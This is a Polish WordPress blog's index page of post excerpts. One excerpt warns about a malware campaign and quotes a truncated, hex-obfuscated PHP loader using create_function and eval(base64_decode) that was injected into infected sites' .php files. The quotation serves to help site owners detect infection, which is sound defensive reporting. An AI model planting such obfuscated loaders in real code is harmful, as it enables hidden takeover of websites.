Preview Posts Everywhere – moja wtyczka do WordPressa

Przed publikacją kolejnych wpisów na blogu bardzo często korzystam z opcji podglądu, aby sprawdzić czy tekst jest prawidłowo sformatowany, czy obrazki są dobrze widoczne itd. Niestety domyślnie WordPress umożliwia podgląd tylko pojedynczej strony. Na stronie głównej czy na stronie kategorii, niestety wpisu już podejrzeć nie można. I właśnie wtyczka Preview Posts Everywhere rozwiązuje ten problem :)

Czytaj dalej

WordCamp Wrocław 2013 – moje podsumowanie

Ostatni weekend (28-29.09.2013) miałem okazje spędzić z profesjonalistami od WordPressa, którzy przyjechali z całej Polski na konferencję WordCamp do Wrocławia. Przez dwa dni zdobywaliśmy nową wiedzę i wymienialiśmy doświadczenia związane z naszym ulubionym systemem. Prelekcje były tak dobrane, że poruszały naprawdę szeroki zakres tematów związanych z WordPressem i myślę, że każdy mógł znaleźć tutaj coś dla siebie. Ja pozwolę sobie wspomnieć kilka wykładów i wydarzeń, które szczególnie utkwiły mi w pamięci.

Czytaj dalej

Ataki na WordPressa z wykorzystaniem złośliwego kodu

Od kilku dni pojawia się coraz więcej zgłoszeń dotyczących zainfekowania przez złośliwy kod, kolejnych stron opartych o WordPressa. Na zarażonych stronach, w nagłówkach wszystkich plików z rozszerzeniem .php, pojawia się następująca linia:

<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107

Zarażone pliki można znaleźć w katalogu głównym WordPressa, w katalogach wp-admin, wp-content a także w plikach szablonów. Dosłownie wszędzie.

Czytaj dalej

Infografika: Bezpieczeństwo WordPressa

Czy wiedziałeś, że od momentu gdy zorientujesz się, że ktoś włamał się na Twoją stronę, do chwili gdy odzyskasz ją z kopii zapasowej, mijają aż 3 dni? Czasami tylko tyle wystarczy, aby narazić się na utratę reputacji!

Bezpieczeństwo WordPressa to temat, który pojawia się coraz częściej w związku z rosnącymi atakami na blogi. Poniżej zamieściłem ciekawą infografikę poświęconą właśnie temu zagadnieniu. Znajdziesz tam m.in. kilka porad, dzięki którym można zminimalizować ryzyko włamania na Twoją stronę. Proste, a naprawdę skuteczne.

Czytaj dalej

Okazja dla twórców stron i wszystkich szukających szablonów WordPressa

Na stronie BundleHunt trwa bardzo ciekawa promocja. Za jedyne $7 można zakupić pakiet o nazwie The Creativity Bundle, w skład którego wchodzi bardzo dużo materiałów dla twórców stron i nie tylko. Znajdziesz tutaj komercyjne szablony do WordPressa, zestaw wybranych e-booków od SmashingMagazine.com, dostęp do materiałów szkoleniowych o produktach Adobe oraz wiele materiałów graficznych. Więcej szczegółów poniżej.

Czytaj dalej

WordPress i formaty wpisów – jakoś tego nie czuję

Formaty wpisów (Post Formats) zostały wprowadzone do WordPressa w wersji 3.1, w lutym 2011 roku. W skrócie, jeżeli szablon obsługuje formaty wpisów, to autor może zmienić wygląd każdego wpisu wybierając po prostu z listy jego typ. Do wyboru mamy 9 formatów: notatka na marginesie (aside), galeria zdjęć, obrazek, odnośnik (link do strony), film (np. z YouTube), cytat, status, audio i chat.

Wybór formatu wpisu

Lista ta jest zamknięta i nie można jej rozszerzyć. Na poniższym zrzucie możesz zobaczyć, jak mogłyby wyglądać wpisy na moim blogu, w zależności od wybranego formatu.

Czytaj dalej